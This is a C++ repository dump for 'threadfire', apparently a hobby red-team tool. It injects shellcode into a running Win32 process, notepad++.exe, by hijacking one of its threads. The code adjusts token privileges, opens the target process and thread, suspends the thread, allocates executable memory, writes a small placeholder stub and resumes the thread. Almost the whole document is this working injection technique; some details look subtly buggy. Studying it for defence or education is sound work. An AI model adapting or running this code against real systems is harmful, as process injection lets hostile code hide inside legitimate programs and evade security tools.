├── .gitignore ├── LICENSE ├── README.md └── src ├── config.h ├── exception.h ├── hijacker.cpp ├── hijacker.h ├── includes.h ├── logger.hpp ├── main.cpp ├── threader.cpp └── threader.h /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # threadfire 2 | Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application. I was 15 years old when I made this - please ignore the substandard code. 3 | 4 | ## About 5 | I developed this small project to continue my experiences of different code injection methods and to allow RedTeam security professionals to utilize this method as a unique way to perform software penetration testing. With Thread hijacking, it allows the hijacker.exe program to susepend a thread within the target.exe program 6 | allowing us to write shellcode to that target thread, and later be executed (via; WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread()). 7 | 8 | 9 | ### Example GIF 10 | ![alt text](https://1.bp.blogspot.com/-pQCXPk6NBB8/XZU5iLWXOFI/AAAAAAAAQf4/2YjvCImtlqAqyhPKL6_ea1GnXJYNiSIwACNcBGAsYHQ/s640/ThreadBoat_1.gif) 11 | 12 | ## Usage 13 | ```cpp 14 | int main() 15 | { 16 | System sys; 17 | Interceptor incp; 18 | Exception exp; 19 | 20 | sys.returnVersionState(); 21 | if (sys.returnPrivilegeEscalationState()) 22 | { 23 | std::cout << "Token Privileges Adjusted\n"; 24 | } 25 | 26 | if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName)) 27 | { 28 | incp.ExecuteWin32Shellcode(m_procId); 29 | } 30 | 31 | system("PAUSE"); 32 | return 0; 33 | } 34 | ``` 35 | ## For Further Information On Thread Execution Hijacking 36 | #### Click On The Link Below 37 | https://capec.mitre.org/data/definitions/30.html 38 | - ntdll.dll 39 | -------------------------------------------------------------------------------- /src/config.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | #pragma once 11 | 12 | #ifndef __CONFIG_H 13 | #define __CONFIG_H 14 | 15 | #include "includes.h" 16 | 17 | #define DBG_SUCCESS_ON_RETURN_VALUE(s_val) ((s_val) == DBG_SUCCESS_STATE) /* FOR RETURNING A SUCCESS CODE {0} */ 18 | #define DBG_ERROR_ON_RETURN_VALUE(s_val) (DBG_SUCCESS_STATE(s_val) == FALSE)) /* FOR RETURNING AN ERROR CODE {-1, ...} */ 19 | #define DBG_SET_VALUE(s_val, kVal) ((s_val) = (kVal)) 20 | 21 | #define NTVERSION_VISTA 6 22 | 23 | typedef enum _DBG_STATE_BOUND 24 | { 25 | /* universal debugging variable*/ 26 | DBG_INVALID_VAR_ANY = -1, 27 | 28 | /* for setting at standard return state [0] */ 29 | DBG_SUCCESS_STATE, 30 | 31 | /* for privilege escalation errors*/ 32 | DBG_ESCALATION_ATTEMPT_FATAL, 33 | 34 | /* for getting windows version error */ 35 | DBG_VERSION_STATE_GETTER_FATAL, 36 | 37 | /* for universal exceptions for THREADENTRY32 */ 38 | DBG_THREADER_STATE_FATAL, 39 | 40 | /* for process state fatal exceptions */ 41 | DBG_PROCESS_STATE_INVALID, 42 | 43 | /* for exceptions on thread suspense */ 44 | DBG_THREAD_SUSPENSION_STATE_FATAL, 45 | 46 | /* for exceptions within a virtual address space */ 47 | DBG_VIRTUAL_MEMORY_STATE_FATAL, 48 | 49 | /* for handling 64-bit exceptions */ 50 | DBG_WRITE_X64_ADDRESS_STATE_FATAL, 51 | 52 | /* for handling 32-bit exceptions */ 53 | DBG_WRITE_X86_ADDRESS_STATE_FATAL, 54 | 55 | /* for handling shellcode exceptions where it could not be written */ 56 | DBG_WRITE_SHELLCODE_TO_THREAD_ADDR_FATAL, 57 | 58 | /* for handling exceptions within the CreateThread address space */ 59 | DBG_WRITE_CREATE_THREAD_ADDR_FATAL, 60 | 61 | } DBG_STATE_BOUND, * P_DBG_STATE_BOUND; 62 | 63 | #endif 64 | -------------------------------------------------------------------------------- /src/exception.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | /* 11 | This class could be defined in any other file, this file serves a pretty universal purpose 12 | but I've decided just to add it for organizing purposes. 13 | */ 14 | #pragma once 15 | #ifndef __EXCEPTION_H 16 | #define __EXCEPTION_H 17 | 18 | #include "logger.hpp" 19 | 20 | class Exception { 21 | 22 | private: 23 | LPVOID m_lpMessageBuffer; 24 | DWORD m_dwLastError = GetLastError(); 25 | 26 | public: 27 | 28 | DBG_STATE_BOUND TBLThrowError(char* m_errorText, DWORD m_dwReturnVal) 29 | { 30 | FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM 31 | | FORMAT_MESSAGE_IGNORE_INSERTS, nullptr, m_dwLastError, LANG_ENGLISH, (LPTSTR)& m_lpMessageBuffer, 32 | 0, NULL); 33 | 34 | std::cerr << m_errorText << " Error Code: " << "0x" << std::hex << m_dwLastError << '\n'; 35 | 36 | return (DBG_STATE_BOUND)m_dwReturnVal; 37 | } 38 | 39 | }; 40 | 41 | 42 | #endif 43 | -------------------------------------------------------------------------------- /src/hijacker.cpp: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | 11 | #include "includes.h" 12 | #include "hijacker.h" 13 | #include "logger.hpp" 14 | #include "exception.h" 15 | 16 | #pragma region NamespaceReferences 17 | using namespace TB; 18 | using Hijacker::System; 19 | using Hijacker::Interceptor; 20 | 21 | #pragma region InternalGlobals 22 | Hijacker::SHELLCODE_INFO psh; 23 | DWORD m_dwInternalProcessId = { 0 }; 24 | 25 | char m_opcode32[] = "\x59\xB8\xD2\x04\xFF\xE0"; 26 | char m_opcode64[] = ""; 27 | 28 | #pragma region Prototypes 29 | DWORD WINAPI ShellcodeEnd(); 30 | 31 | __declspec(naked) void Shellcode() 32 | { 33 | __asm 34 | { 35 | start: 36 | pop ecx 37 | mov eax, 0x4d2 38 | jmp eax 39 | } 40 | } 41 | // "\x59\xB8\xD2\x04\x00\x00\xFF\xE0" 42 | 43 | extern DBGLogger dbgLogger("1.1", "tb_sys_logs.log"); 44 | 45 | PCHAR System::returnVersionState() 46 | { 47 | dbgStatus = DBG_INVALID_VAR_ANY; 48 | 49 | std::memset(&m_systemVersionInfo, 0, sizeof(OSVERSIONINFO)); 50 | m_systemVersionInfo.dwOSVersionInfoSize = sizeof(m_systemVersionInfo); 51 | if (m_systemVersionInfo.dwPlatformId != VER_PLATFORM_WIN32_NT && m_systemVersionInfo.dwMajorVersion 52 | <= NTVERSION_VISTA) 53 | { 54 | DBG_SET_VALUE(dbgStatus, DBG_VERSION_STATE_GETTER_FATAL); 55 | return (PCHAR)FALSE; 56 | } 57 | else if (m_systemVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT && m_systemVersionInfo.dwMajorVersion 58 | >= NTVERSION_VISTA) 59 | { 60 | std::cout << m_systemVersionInfo.dwMajorVersion << '\n'; 61 | } 62 | 63 | } 64 | 65 | void System::setTokenPrivileges() 66 | { 67 | m_localTokenPrivs.PrivilegeCount = 1; 68 | m_localTokenPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 69 | m_localTokenPrivs.Privileges[0].Luid.LowPart = 20; 70 | m_localTokenPrivs.Privileges[0].Luid.HighPart = 0; 71 | } 72 | 73 | DBG_STATE_BOUND System::returnPrivilegeEscalationState() 74 | { 75 | System sys; 76 | Exception exp; 77 | dbgStatus = DBG_INVALID_VAR_ANY; 78 | 79 | sys.setTokenPrivileges(); 80 | if (OpenProcessToken((HANDLE)DBG_INVALID_VAR_ANY, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &m_hToken)) 81 | { 82 | AdjustTokenPrivileges(m_hToken, FALSE, &m_localTokenPrivs, 0x00, NULL, 0x00); 83 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_INFO << " Adjusted Token Privileges"; 84 | CloseHandle(m_hToken); 85 | } 86 | else { 87 | DBG_SET_VALUE(dbgStatus, DBG_ESCALATION_ATTEMPT_FATAL); 88 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << " AdjustTokenPrivileges() - FATAL\n"; 89 | exp.TBLThrowError((LPSTR)"DBG_ESCALATION_ATTEMPT_FATAL", DBG_INVALID_VAR_ANY); 90 | } 91 | 92 | return dbgStatus; 93 | } 94 | 95 | DWORD Interceptor::FindWin32ProcessId(char* m_win32ProcessName) 96 | { 97 | PROCESSENTRY32 m_procEntry32 = { 0 }; 98 | HANDLE m_leHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0x00); 99 | m_procEntry32.dwSize = sizeof(PROCESSENTRY32); 100 | 101 | if (m_leHandle != NULL) 102 | { 103 | if (Process32First(m_leHandle, &m_procEntry32)) 104 | { 105 | do 106 | { 107 | if (!strcmp(m_procEntry32.szExeFile, m_win32ProcessName)) 108 | 109 | return m_dwInternalProcessId = m_procEntry32.th32ProcessID; 110 | } while (Process32Next(m_leHandle, &m_procEntry32)); 111 | } 112 | else { 113 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "Could Not Identify Process ID\n"; 114 | 115 | } 116 | 117 | } 118 | CloseHandle(m_leHandle); 119 | 120 | return m_dwInternalProcessId; 121 | } 122 | 123 | #include "threader.h" 124 | 125 | DBG_STATE_BOUND Interceptor::ExecuteWin32Shellcode(DWORD m_processId) 126 | { 127 | Threader threader; 128 | Exception exp; 129 | dbgStatus = DBG_INVALID_VAR_ANY; 130 | 131 | DWORD m_mainThreadId = threader.FindThreadWithinWin32Process(m_processId); 132 | HANDLE m_win32Process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, m_processId); 133 | if (m_win32Process == NULL) 134 | { 135 | DBG_SET_VALUE(dbgStatus, DBG_PROCESS_STATE_INVALID); 136 | /* logger.hpp, exception.h */ 137 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "OpenProcess() - FATAL"; 138 | exp.TBLThrowError((LPSTR)"DBG_PROCESS_STATE_INVALID", DBG_INVALID_VAR_ANY); 139 | } 140 | 141 | /* PROCEED TO OPEN THE THREAD */ 142 | HANDLE m_hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, m_mainThreadId); 143 | if (!m_hThread) 144 | { 145 | DBG_SET_VALUE(dbgStatus, DBG_THREADER_STATE_FATAL); 146 | /* logger.hpp, exception.h */ 147 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "OpenThread() - FATAL"; 148 | exp.TBLThrowError((LPSTR)"DBG_THREADER_STATE_FATAL", DBG_INVALID_VAR_ANY); 149 | } 150 | 151 | m_lpContext = new CONTEXT(); 152 | m_lpContext->ContextFlags = CONTEXT_FULL; 153 | 154 | if (SuspendThread(m_hThread) == DBG_INVALID_VAR_ANY) 155 | { 156 | DBG_SET_VALUE(dbgStatus, DBG_THREAD_SUSPENSION_STATE_FATAL); 157 | /* logger.hpp, exception.h */ 158 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "SuspendThread() - FATAL\n"; 159 | exp.TBLThrowError((LPSTR)"DBG_THREAD_SUSPENSION_STATE_FATAL", DBG_INVALID_VAR_ANY); 160 | } 161 | 162 | /* LAST THREADER CHECK */ 163 | if (!GetThreadContext(m_hThread, m_lpContext)) 164 | { 165 | DBG_SET_VALUE(dbgStatus, DBG_THREADER_STATE_FATAL); 166 | /* logger.hpp, exception.h */ 167 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "GetThreadContext() - FATAL\n"; 168 | exp.TBLThrowError((LPSTR)"DBG_THREADER_STATE_FATAL", DBG_INVALID_VAR_ANY); 169 | } 170 | 171 | LPVOID m_lpShellcodeBaseAddr = (LPVOID)VirtualAllocEx(m_win32Process, NULL, SHELLCODE_BASE_SIZE, MEM_RESERVE | 172 | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 173 | if (m_lpShellcodeBaseAddr) { 174 | std::cout << "\nMemory Allocated(Virtual) at: 0x" << 175 | m_lpShellcodeBaseAddr << '\n'; 176 | } 177 | else { 178 | dbgStatus = DBG_SET_VALUE(dbgStatus, DBG_VIRTUAL_MEMORY_STATE_FATAL); 179 | /* logger.hpp, exception.h */ 180 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "VirtualAllocEx() - FATAL\n"; 181 | exp.TBLThrowError((LPSTR)"\n[DBG_VIRTUAL_MEMORY_STATE_FATAL]", DBG_INVALID_VAR_ANY); 182 | 183 | } 184 | 185 | #ifdef _WIN64 186 | #define ARCHITECHTURE_64BIT 187 | /* HANDLE 64-BIT STACK ADDRESSES */ 188 | psh.m_lpShellcode = m_opcode64; 189 | psh.dwSize = sizeof(m_opcode64); 190 | m_lpContext->Rsp -= 0x8; 191 | /* WRITE THE ORIGINAL RIP */ 192 | if (!WriteProcessMemory(m_win32Process, (PVOID)m_lpContext->Rsp, &m_lpContext->Rip, sizeof(PVOID), nullptr)) 193 | { 194 | DBG_SET_VALUE(dbgStatus, DBG_WRITE_X64_ADDRESS_STATE_FATAL); 195 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "write_x64_address - FATAL"; 196 | return (DBG_STATE_BOUND)FALSE; 197 | } 198 | psh.m_lpCreateThreadAddr = CreateThread; 199 | std::cout << "\tCreateThread Located at: " << psh.m_lpCreateThreadAddr << '\n'; 200 | 201 | #endif 202 | 203 | #ifdef _WIN32 204 | #define ACHITECHTURE_32BIT 205 | /* HANDLE 32-BIT STACK ADDRESSES*/ 206 | psh.m_lpShellcode = m_opcode32; 207 | psh.dwSize = ((DWORD)ShellcodeEnd - (DWORD)Shellcode | sizeof(m_opcode32)); 208 | m_lpContext->Esp -= 0x4; 209 | /* WRITE THE ORIGINAL EIP */ 210 | if (!WriteProcessMemory(m_win32Process, (PVOID)m_lpContext->Esp, &m_lpContext->Eip, sizeof(PVOID), nullptr)) 211 | { 212 | DBG_SET_VALUE(dbgStatus, DBG_WRITE_X86_ADDRESS_STATE_FATAL); 213 | dbgLogger << DBGLogger::m_loggerType::DBG_LOGGER_ERROR << "write_x86_address - FATAL"; 214 | return (DBG_STATE_BOUND)FALSE; 215 | } 216 | psh.m_lpCreateThreadAddr = CreateThread; 217 | std::cout << "\tCreateThread Located at: 0x" << psh.m_lpCreateThreadAddr << '\n'; 218 | 219 | #endif 220 | 221 | if (!WriteProcessMemory(m_win32Process, m_lpShellcodeBaseAddr, &psh.m_lpCreateThreadAddr, sizeof(SIZE_T), NULL)) 222 | { 223 | DBG_SET_VALUE(dbgStatus, DBG_WRITE_CREATE_THREAD_ADDR_FATAL); 224 | ResumeThread(m_hThread); 225 | return (DBG_STATE_BOUND)FALSE; 226 | } 227 | 228 | /* WRITE THE SHELLCODE TO THE TARGET PROCESS */ 229 | if (!WriteProcessMemory(m_win32Process, m_lpShellcodeBaseAddr, psh.m_lpShellcode, sizeof(LPVOID), NULL)) 230 | { 231 | DBG_SET_VALUE(dbgStatus, DBG_WRITE_SHELLCODE_TO_THREAD_ADDR_FATAL); 232 | ResumeThread(m_hThread); 233 | return (DBG_STATE_BOUND)FALSE; 234 | } 235 | 236 | else { std::cout << "Shellcode Written To: 0x" << std::hex << m_lpShellcodeBaseAddr << '\n'; } 237 | 238 | /* UPDATE THREAD CONTEXT */ 239 | if (!SetThreadContext(m_hThread, m_lpContext)) { return (DBG_STATE_BOUND)FALSE; } 240 | if (!ResumeThread(m_hThread)) { return (DBG_STATE_BOUND)FALSE; } 241 | 242 | delete m_lpContext; 243 | 244 | return dbgStatus; 245 | } 246 | 247 | DWORD WINAPI ShellcodeEnd() 248 | { 249 | return 0; 250 | } -------------------------------------------------------------------------------- /src/hijacker.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | #pragma once 11 | 12 | #ifndef __HIJACKER_H 13 | #define __HIJACKER_H 14 | 15 | #include "config.h" 16 | 17 | #define SHELLCODE_BASE_SIZE 0x1000 /* 0x1000 = 4096 which is a very common buffer size when dealing with 18 | virtual memory spaces. */ 19 | 20 | namespace Hijacker { 21 | 22 | typedef struct _SHELLCODE_INFO { 23 | 24 | DWORD dwSize; 25 | LPVOID m_lpShellcode; 26 | LPVOID m_lpCreateThreadAddr; 27 | // adding more shit... 28 | } SHELLCODE_INFO, * PSHELLCODE_INFO; 29 | 30 | class System { 31 | 32 | protected: 33 | DBG_STATE_BOUND dbgStatus; 34 | 35 | private: 36 | TOKEN_PRIVILEGES m_localTokenPrivs; 37 | HANDLE m_hToken; 38 | OSVERSIONINFO m_systemVersionInfo; 39 | 40 | /* PUBLIC MEMBER FUNCTIONS */ 41 | public: 42 | PCHAR returnVersionState(); 43 | void setTokenPrivileges(); 44 | DBG_STATE_BOUND returnPrivilegeEscalationState(); 45 | }; 46 | 47 | class Interceptor : public System { 48 | /* PRIVATE MEMBER VARIABLES */ 49 | private: 50 | THREADENTRY32 m_threadEntry32; 51 | BOOL m_bThreadFound32 = false; 52 | 53 | LPCONTEXT m_lpContext; 54 | /* PUBLIC MEMBER FUNCTIONS */ 55 | public: 56 | DWORD FindWin32ProcessId(char* m_win32ProcesName); 57 | DBG_STATE_BOUND ExecuteWin32Shellcode(DWORD m_processId); 58 | 59 | }; 60 | 61 | } 62 | 63 | 64 | #endif -------------------------------------------------------------------------------- /src/includes.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | #pragma once 11 | 12 | #ifndef __INCLUDES_H 13 | #define __INCLUDES_H 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include "conio.h" 25 | 26 | #pragma comment(lib, "ntdll.lib") 27 | 28 | #endif -------------------------------------------------------------------------------- /src/logger.hpp: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | #pragma once 11 | #ifndef __LOGGER_HPP 12 | #define __LOGGER_HPP 13 | 14 | #include "includes.h" 15 | #include "config.h" 16 | 17 | namespace TB { 18 | 19 | class DBGLogger { 20 | 21 | public: 22 | enum class m_loggerType { DBG_LOGGER_ERROR, DBG_LOGGER_WARNING, DBG_LOGGER_INFO }; 23 | 24 | explicit DBGLogger(const char* m_threadBoatVersion, const char* m_fileName) 25 | : m_warningCount(0U), 26 | m_errorCount(0U) 27 | { 28 | m_logFile.open(m_fileName); 29 | 30 | if (m_logFile.is_open()) { m_logFile << "ThreadBoat Version: " << m_threadBoatVersion << '\n'; } 31 | } 32 | 33 | ~DBGLogger() 34 | { 35 | if (m_logFile.is_open()) 36 | { 37 | m_logFile << std::endl << std::endl; 38 | 39 | m_logFile << m_warningCount << " :: warnings\n"; 40 | m_logFile << m_errorCount << " :: errors\n"; 41 | 42 | m_logFile.close(); 43 | } 44 | } 45 | 46 | friend DBGLogger& operator << (DBGLogger& m_logger, const m_loggerType m_type) 47 | { 48 | switch (m_type) { 49 | case DBGLogger::m_loggerType::DBG_LOGGER_ERROR: 50 | m_logger.m_logFile << "[ERROR]: "; 51 | ++m_logger.m_errorCount; 52 | break; 53 | 54 | case DBGLogger::m_loggerType::DBG_LOGGER_WARNING: 55 | m_logger.m_logFile << "[WARNING]: "; 56 | ++m_logger.m_warningCount; 57 | break; 58 | 59 | case DBGLogger::m_loggerType::DBG_LOGGER_INFO: 60 | m_logger.m_logFile << "[INFO]: "; 61 | break; 62 | } 63 | return m_logger; 64 | } 65 | 66 | friend DBGLogger& operator << (DBGLogger& m_logger, const char* m_fileText) 67 | { 68 | m_logger.m_logFile << m_fileText << std::endl; 69 | return m_logger; 70 | } 71 | 72 | friend DBGLogger& operator << (DBGLogger& m_logger, DWORD dwOpt) 73 | { 74 | m_logger.m_logFile << dwOpt << std::endl; 75 | } 76 | 77 | DBGLogger(const DBGLogger&) = delete; 78 | DBGLogger& operator = (const DBGLogger&) = delete; 79 | 80 | private: 81 | std::ofstream m_logFile; 82 | unsigned int m_warningCount; 83 | unsigned int m_errorCount; 84 | 85 | }; 86 | 87 | } 88 | 89 | 90 | 91 | #endif -------------------------------------------------------------------------------- /src/main.cpp: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | #include "includes.h" 11 | #include "hijacker.h" 12 | #include "logger.hpp" 13 | #include "exception.h" 14 | 15 | using namespace TB; 16 | using Hijacker::System; 17 | using Hijacker::Interceptor; 18 | 19 | #pragma region MainGlobals 20 | const char* m_win32ProcessName = "notepad++.exe"; 21 | 22 | int main() 23 | { 24 | System sys; 25 | Interceptor incp; 26 | Exception exp; 27 | 28 | sys.returnVersionState(); 29 | if (sys.returnPrivilegeEscalationState()) 30 | { 31 | std::cout << "Token Privileges Adjusted\n"; 32 | } 33 | 34 | if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName)) 35 | { 36 | incp.ExecuteWin32Shellcode(m_procId); 37 | } 38 | 39 | system("PAUSE"); 40 | return 0; 41 | } -------------------------------------------------------------------------------- /src/threader.cpp: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | #include "threader.h" 11 | 12 | 13 | DWORD Threader::FindThreadWithinWin32Process(DWORD m_threaderProcessId) 14 | { 15 | dbgStatus = DBG_INVALID_VAR_ANY; 16 | 17 | HANDLE m_threaderSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); 18 | m_threadEntry32.dwSize = sizeof(THREADENTRY32); 19 | if (m_threaderSnapshot == INVALID_HANDLE_VALUE) 20 | { 21 | DBG_SET_VALUE(dbgStatus, DBG_THREADER_STATE_FATAL); 22 | throw std::runtime_error("DBG_THREADER_STATE_FATAL"); 23 | } 24 | 25 | if (!Thread32First(m_threaderSnapshot, &m_threadEntry32)) 26 | { 27 | DBG_SET_VALUE(dbgStatus, DBG_THREADER_STATE_FATAL); 28 | throw std::runtime_error("DBG_THREADER_STATE_FATAL"); 29 | } 30 | 31 | while (Thread32Next(m_threaderSnapshot, &m_threadEntry32)) 32 | { 33 | if (m_threadEntry32.th32OwnerProcessID == m_threaderProcessId) 34 | { 35 | m_isThreadFound = true; 36 | break; 37 | } 38 | } 39 | 40 | CloseHandle(m_threaderSnapshot); 41 | 42 | if (m_isThreadFound == TRUE) { return m_threadEntry32.th32ThreadID; } 43 | else { 44 | DBG_SET_VALUE(dbgStatus, DBG_THREADER_STATE_FATAL); 45 | throw std::runtime_error("DBG_THREADER_STATE_FATAL"); 46 | } 47 | 48 | return 0; 49 | } -------------------------------------------------------------------------------- /src/threader.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2020 Josh Schiavone - All Rights Reserved 2 | * You may use, distribute and modify this code under the 3 | * terms of the MIT license, which unfortunately won't be 4 | * written for another century. 5 | * 6 | * You should have received a copy of the MIT license with 7 | * this file. If not, visit : https://opensource.org/licenses/MIT 8 | */ 9 | 10 | #pragma once 11 | 12 | #ifndef __THREADER_H 13 | #define __THREADER_H 14 | 15 | #include "includes.h" 16 | #include "config.h" 17 | #include "hijacker.h" 18 | 19 | using namespace Hijacker; 20 | 21 | class Threader : public Interceptor { 22 | private: 23 | THREADENTRY32 m_threadEntry32; 24 | HANDLE m_hThreader; 25 | bool m_isThreadFound; 26 | 27 | public: 28 | DWORD FindThreadWithinWin32Process(DWORD m_threaderProcessId); 29 | 30 | }; 31 | 32 | #endif 33 | --------------------------------------------------------------------------------